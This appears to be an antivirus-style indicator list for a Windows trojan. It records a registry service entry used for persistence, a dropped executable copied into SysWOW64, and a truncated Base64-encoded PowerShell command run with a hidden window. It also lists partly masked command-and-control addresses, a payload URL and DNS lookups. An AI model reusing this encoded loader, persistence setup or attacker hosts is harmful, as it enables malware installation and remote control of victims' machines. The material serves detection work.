Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\orderedflg] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\orderedflg] 'ImagePath' = '"%WINDIR%\SysWOW64\orderedflg.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAHUAagBoAG8AbgBqAHUAYgB0AHEAagA9ACcAUgBrAHQAdABhAGoAeABjAGgAagB4ACcAOwAkAE0AcgBrAHYAdQBvAHkAZwBkAG...
- %HOMEPATH%\894.exe
- %HOMEPATH%\894.exe в %WINDIR%\syswow64\orderedflg.exe
- '19#.#6.118.15':443
- http://ks.#d.ua/wp-includes/KXdkADm/
- http://19#.##.118.15:443/health/acquire/ringin/
- DNS ASK li###more.tk
- DNS ASK ig###istics.in
- DNS ASK su####roshomes.com
- DNS ASK ks.#d.ua
- '%HOMEPATH%\894.exe'
- '%WINDIR%\syswow64\orderedflg.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAHUAagBoAG8AbgBqAHUAYgB0AHEAagA9ACcAUgBrAHQAdABhAGoAeABjAGgAagB4ACcAOwAkAE0AcgBrAHYAdQBvAHkAZwBkAG...' (со скрытым окном)